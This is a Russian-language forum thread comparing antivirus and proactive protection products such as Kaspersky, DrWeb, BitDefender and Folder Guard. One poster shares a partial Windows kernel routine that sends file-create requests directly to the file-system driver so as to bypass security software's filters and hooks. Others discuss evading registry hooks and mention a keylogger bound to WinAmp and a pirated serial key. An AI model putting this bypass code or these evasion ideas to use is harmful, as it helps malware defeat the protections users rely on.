Уже тема поднималась неоднократно, просто с выходом новой версии DrWeb'a поднялась снова - какой антивирус выбрать...Предлагаю обсудить антивирусы (именно те, которые стоят на ваших домашних\рабочих компах), их плюсы и минусы. За основу думаю стоит взять наиболее популярные программы, т.к. проводить тестирование по обнаружению вирей желания нету.. Критериев несколько - скорость работы сканера, монитора, системы после установки антивиря, возможность и размеры автоматического обновления баз, разнообразие настроек. Ну и железо, на котором антивирь стоит.
Я ставил каспера 5.0 на домашний и на рабочий комп - тормоза при включенном сканере наблюдались капитальные, плюс на рабочем компе некоторые безобидные тулзы были удалены без ведома юзера (т.е. меня). К тому же полная проверка дисков висла на одном из архивов бух.проги, а после исключения из списков проверки найденные вири удаляться отказывались - каспер падал с ошибкой при удалении. Размер обновляемых баз >500 Кб в день - не очень радует...
ДрВеб 4.33 неплохо работает на домашнем компе, на рабочем (PIV-1500,128 метров памяти) тормоза жуткие, сканер полное сканирование дисков (2Х20 метров) так и не смог довести до конца. Размер обновляемых баз довольно маленький, криво реализовано автоматическое обновление. Убогий интерфейс, криво реализована автоматическая проверка...
По отзывам - Панда жутко тормозит (очень жутко).
Хотелось бы узнать, как (и какие) антивири работают у других, их достоинства и недостатки.

| Сообщение посчитали полезным:

Ms-Rem
Ну в принципе ты конечно прав, но хочется иметь у себя что-то более-менее приличное, чтоб защищала не от абсолютного, но все же большинства вирей и троев. Часто попадаются старые вирусы, мне недавно принесли на диске с офисом 2003 старый вирь, который калечит файлы. Ведь не будешь проверять вручную каждую запускаемую прогу или дистр.

| Сообщение посчитали полезным:

Ms-Rem пишет:
Куда бы не пошли разработчики защиты, разработчики троянов всегда ее смогут обойти, в этом я уверен на 100%.

А так было всегда, идет гонка вооружений... Главное чтобы системы защиты в этой гонке были немножко впереди, что к сожалению не всегда так

| Сообщение посчитали полезным:

Антивирусные компании говорят, что не берут на работу бывших вирусописателей, типа у них работают только дипломированые специалисты. Мне сначала казалось что это так, пиар, но теперь я думаю что это правда. Потому что такие слабые защиты могут сделать только дипломированые специалисты, которые имеют по 5 дипломов, но никогда в жизни сами ничего не ломали. Проблема аверов в том, что у них работают спецы которые просто не понимают суть предмета. И пока из таких спецов будут набираться команды программистов, троянописателям ничего не грозит, любая сделаная ими защита это максимум 5 минут работы.

-----
Скажем дружно - нафиг нужно.

| Сообщение посчитали полезным:

Ms-Rem пишет:
Антивирусные компании говорят, что не берут на работу бывших вирусописателей, типа у них работают только дипломированые специалисты. Мне сначала казалось что это так, пиар, но теперь я думаю что это правда. Потому что такие слабые защиты могут сделать только дипломированые специалисты, которые имеют по 5 дипломов, но никогда в жизни сами ничего не ломали. Проблема аверов в том, что у них работают спецы которые просто не понимают суть предмета. И пока из таких спецов будут набираться команды программистов, троянописателям ничего не грозит, любая сделаная ими защита это максимум 5 минут работы.
хм. dr.golova & red plait - "в жизни ничего не ломали"?

| Сообщение посчитали полезным:

Ну бывают и исключения, но имхо таких мало.

-----
Скажем дружно - нафиг нужно.

| Сообщение посчитали полезным:

а тебе не кажется, что защищают так, потому что основной доход у них от корпоративных клиентов?

| Сообщение посчитали полезным:

[deleted]

-----
Скажем дружно - нафиг нужно.

| Сообщение посчитали полезным:

ох рискую навлечь гнев на свою голову но кажется мне тут делятся и вирусными технологиями вот и мне хочется поделится а главное услышать ваше мнение. я поднимал подобную тему на васме но никто не стал обсуждать только dr.golova сказал что - боян. кому интересно идея описана в аттаче... имхо идея хорошая странно что об это раньше никто не писал... хотя мож и писали но я не встречал.




e418_crypto.txt.zip

-----
power and the money money and the power

| Сообщение посчитали полезным:

Да пообсуждали её там немного, пока wasm работал. Вот wasm очнётся(или это у меня с нетом глюки), прочитаешь.

| Сообщение посчитали полезным:

В журнале Системный Администратор rapidshare.de/files/8266332/sisagmin2005-07.rar.html (3,36м)
был обзор проактивных систем защиты типа SnS.

Судя по всему будущее за такими системами.

| Сообщение посчитали полезным:

Внимание! Данная информация предназначена только для пользователей антивирусных продуктов Dr.Web версии 4.32b и ниже. - info.drweb.com/show/2736
Может кому пригодится. Я уже споткнулся на этом...

-----
Сколько ни наталкивали на мысль – все равно сумел увернуться

| Сообщение посчитали полезным:

SASH_113 пишет:
В журнале Системный Администратор rapidshare.de/files/8266332/sisagmin2005-07.rar.html (3,36м)
был обзор проактивных систем защиты типа SnS.

Я тож думаю, что будущее за ними, но журналам не доверяю. Может кто поделится ссылками и мнениями о других системах проактивной защиты, а также о их преимуществах и недостатках. Охота провести "независимую оценку"

-----
Research is my purpose

| Сообщение посчитали полезным:

у меня стоит Folder Guard
через неё поставил на read-only файлы типа :
*.exe;*.dll;*.zip; *.sys;*.drv;*.ax;*.scr;*.bpl;*.cpl;*.cab;*.bin;*.acm;*.com;*.doc;*.mp3
тоесть все попытки записи в такие файлы от "не доверенных" прог режутся драйвером
обозначил доверенные проги.
+
ZoneAlarm Pro version 6.1.737.000
его osfirewall он блокирует подозрительные действия программ : загрузка драйвера, открытие процесса, установка глобальных хуков и т.д.
вот и не нада никаких антивирей .
эта связка у меня уже давно и всё ок.

| Сообщение посчитали полезным:

WarrioR

СПАСИБО! =)

-----
power and the money money and the power

| Сообщение посчитали полезным:

doctor Ice пжалуста, а зачто спасиба то?

| Сообщение посчитали полезным:

ну как же подсказал на чем зверей тестировать =)

-----
power and the money money and the power

| Сообщение посчитали полезным:

WarrioR пишет:
тоесть все попытки записи в такие файлы от "не доверенных" прог режутся драйвером Да, это наверно, еще Ms-Rem до этой проги не добрался
У меня тут одна мысль появилась. Реестр винды хранится на диске в виде файлов. Если откопать этот файл в Windows, то зная как он устроен (да в HEX наверно достаточно посмотреть) можно, наверно, придумать способ, как в него что-нибудь прописать, не используя при этом RegSetValueEx и тому подобные функции... Это я про обход хуков на запись в реестр, которые устанавливают проги типа SNS... Интересно услышать мнения, насколько это реально.

-----
Research is my purpose

| Сообщение посчитали полезным:

Error_Log пишет:
У меня тут одна мысль появилась. Реестр винды хранится на диске в виде файлов. Если откопать этот файл в Windows, то зная как он устроен (да в HEX наверно достаточно посмотреть) можно, наверно, придумать способ, как в него что-нибудь прописать, не используя при этом RegSetValueEx и тому подобные функции... Это я про обход хуков на запись в реестр, которые устанавливают проги типа SNS... Интересно услышать мнения, насколько это реально.

просто так в эти файлы записать низя, т.к. ани блокированы системой, низя даже открыть на чтение их

| Сообщение посчитали полезным:

Error_Log
Это было бы реально, но помойму снс ставит хуки и на запись в файлы, а не только реестр, так что борода
Кроме того, вындус не даст писать в реестр ничем кроме функций работы с реестром (если только не сбацать что нить в обход, как любит делать Ms-Rem)

-----
"Пусть видят, что мы не шутим. Стволы для понта, ножи для дела" Lock, Stock & Two Smoking Barrels

| Сообщение посчитали полезным:

Smon пишет:
если только не сбацать что нить в обход, как любит делать Ms-Rem
Я ж про то и говорю, а то я и так знаю, что низя. Просто такой фигней никто не страдал, потому-что в этом небыло необходимости, но с развитием превентивных технологий, может возникнуть...

-----
Research is my purpose

| Сообщение посчитали полезным:

Error_Log пишет:
Просто такой фигней никто не страдал, потому-что в этом небыло необходимости
Зря ты так думаешь-наверняка страдали...

| Сообщение посчитали полезным:

на самам деле макаффи самый рульны, но пачимута пад руку пастаянна пападаеца касперыч, и приходица ставить ево. Хатя касперыч инагда проста до бешенства бесит тем што палит патчеры, ребилдэры и прочий палезный софт...каму он мешает...

ЗЫ:ещо рульный антивирус AntiVir, жаль с абнавлениями там туга

| Сообщение посчитали полезным:

ku-klux-klan пишет:
жаль с абнавлениями там туга
и с русским языком похоже тоже...

| Сообщение посчитали полезным:

WarrioR
ГыГы
www.uinc.ru/news/sn5381.html

-----
Подписи - ЗЛО! Нужно убирать!

| Сообщение посчитали полезным:

nice пишет:
WarrioR
ГыГы
http://www.uinc.ru/news/sn5381.html http://www.uinc.ru/news/sn5381.html

пароли я не ставил, ибо не те цели преследовал, а абойти чо угодно можно.
главно что вирус обломится записать своё тело в исполняемые файлы

ShadowBeast сообщает о возможности обхода парольной защиты в программе Folder Guard v4.11. Обойти парольную защиту становится возможным в результате переименования или перемещения файла пароля "FGuard.FGP".

Folder Guard v4.11 старьё, я использую 6ю версию, когда защита включена то вся папка где установлена программа защищена по типу read-only, так что переименовать/переместить FGuard.FGP не получится

| Сообщение посчитали полезным:

Полный обход ShadowUser, Folder Guard и других подобных прог влезает в 15кб исходного кода. Смысл метода состоит в поиске оригинальных точек входа драйвера ФС и формировании запросов напрямую к нему, минуя все фильтры и хуки защитного софта. Полный код приводить не стану, но фрагменты покажу:

NTSTATUS
DioCreateFile(
IN PWCHAR lpFileName,
IN ULONG dwDesiredAccess,
IN ULONG dwShareMode,
IN ULONG dwCreationDisposition,
OUT PFILE_OBJECT *pFileObject
)
{
NTSTATUS status;
WCHAR Name[MAX_PATH+1] = {0};
OBJECT_ATTRIBUTES obj;
IO_STATUS_BLOCK IoStatus;
UNICODE_STRING uName;
HANDLE hFile = NULL;
PWCHAR cPtr = lpFileName + wcslen(lpFileName);
PFILE_OBJECT DirFile;

....

if (NT_SUCCESS(status))
{
PDEVICE_OBJECT DeviceObject = IoGetLovestDeviceObject(DirFile);
PIRP Irp = IoAllocateIrp(DeviceObject->StackSize, FALSE);
IO_SECURITY_CONTEXT ScContext;
ACCESS_STATE AccessState;
AUX_ACCESS_DATA AuxData;

if (DeviceObject->Flags & (DO_DIRECT_IO | DO_BUFFERED_IO))
{
IoFreeIrp(Irp);
Irp = NULL;
}

swprintf(Name, L"%ws%ws", DirFile->FileName.Buffer, cPtr);

RtlInitUnicodeString(&uName, Name);

if (Irp)
{
PIO_STACK_LOCATION IrpSp = IoGetNextIrpStackLocation(Irp);
PFILE_OBJECT FileObject;

InitializeObjectAttributes(
&obj,
NULL,
OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE,
NULL,
NULL
);

status = ObCreateObject(
KernelMode,
*IoFileObjectType,
&obj,
KernelMode,
NULL,
sizeof(FILE_OBJECT),
0,
0,
&FileObject
);

if (!NT_SUCCESS(status))
{
IoFreeIrp(Irp);
goto _exit;
}

Irp->Tail.Overlay.Thread = PsGetCurrentThread();
Irp->RequestorMode = KernelMode;
Irp->Flags = IRP_CREATE_OPERATION | IRP_SYNCHRONOUS_API | IRP_DEFER_IO_COMPLETION;

SeCreateAccessState(
&AccessState,
&AuxData,
dwDesiredAccess,
NULL
);

.....

IrpSp->Control = 0;
IrpSp->MajorFunction = IRP_MJ_CREATE;
IrpSp->Parameters.Create.EaLength = 0;
IrpSp->Flags = FILE_SYNCHRONOUS_IO_NONALERT;

Irp->Overlay.AllocationSize.QuadPart = 0;
Irp->AssociatedIrp.SystemBuffer = NULL;

IrpSp->Parameters.Create.Options = (dwCreationDisposition << 24) | (FILE_SYNCHRONOUS_IO_NONALERT & 0x00ffffff);
IrpSp->Parameters.Create.FileAttributes = FILE_ATTRIBUTE_NORMAL;
IrpSp->Parameters.Create.ShareAccess = (USHORT)dwShareMode;
IrpSp->Parameters.Create.SecurityContext = &ScContext;

......

FileObject->Type = IO_TYPE_FILE;
FileObject->Size = sizeof(FILE_OBJECT);
FileObject->RelatedFileObject = NULL;
FileObject->Flags = FO_SYNCHRONOUS_IO;

KeInitializeEvent(&FileObject->Lock, SynchronizationEvent, FALSE);

FileObject->Waiters = 0;
FileObject->CurrentByteOffset.QuadPart = 0;
FileObject->DeviceObject = DeviceObject;

Irp->Tail.Overlay.OriginalFileObject = FileObject;
IrpSp->FileObject = FileObject;

FileObject->FileName.MaximumLength = MAX_PATH*2;

FileObject->FileName.Buffer = ExAllocatePool(PagedPool, MAX_PATH*2);

RtlCopyUnicodeString(&FileObject->FileName, &uName);

KeInitializeEvent(&FileObject->Event, NotificationEvent, FALSE);

status = DirectCallDriver(DeviceObject, Irp);

if (status == STATUS_PENDING)
{
KeWaitForSingleObject(
&FileObject->Event,
Executive,
KernelMode,
FALSE,
NULL
);

status = IoStatus.Status;
}

-----
Скажем дружно - нафиг нужно.

| Сообщение посчитали полезным:

Ms-Rem пишет:
Полный обход ShadowUser, Folder Guard и других подобных прог влезает в 15кб исходного кода. Смысл метода состоит в поиске оригинальных точек входа драйвера ФС и формировании запросов напрямую к нему, минуя все фильтры и хуки защитного софта.

сделай демку и посмотрим как ана минует все фильтры и хуки защитного софта

| Сообщение посчитали полезным:

Извини, демки не будет. Я показал пример кода описывающего возможность такого обхода, но ни полного кода ни демок делать не стану, пусть тот кому это надо работает над этим сам. К тому же неохото облегчать жизнь авторам защитного софта, пусть ловят в дикой природе.

-----
Скажем дружно - нафиг нужно.

| Сообщение посчитали полезным:

Ms-Rem
SNS ты завалил что на очереди?

| Сообщение посчитали полезным:

Хочу высказать личное мнеине этому поводу.
Пиведу некоторые сравнительные характеристика.
Обьем оперативы :
Под XP
- KAV 5.1.3 тянет 23 Мб + Свопит комп при скане.Для работы со сравнительно маленьким свопом нужен Windows patch, не помню какой, где-то записано.
- Dr.WEB 8 Мб - сравнительно не свопит систему.
- bitdefender_prof_v9 10 Мб - Есть опция Low Level Scan
- NOD 32 - 12 Мб

Да антивирусные базы Касперского впечетляют своим обьемом.Но это не главное в анитвире.
Приведу пример:
Мой знакомый прикрепил к WinAmp'y простой троян, упаковал его и выложил на ФТП'ешнике.
Запуская Винамп, запускается троян и собирает информацию о всех нажатых клавишах.
При этом ни Касперский ни НОД 32 ни Доктор Веб с последними обновлениями его пропустили.
Зато bitdefender_prof_v9 со стандартной базой, узнал его еще при запуске.

Поэтому я выбрал последний.Конечно у него есть свои минусы,но помоему незначительные.
Сам инстал найти не сложно, весит 17 мб, а серийный ключ можно скачать отсюда:
rapidshare.de/files/13471082/sn.txt.html

| Сообщение посчитали полезным: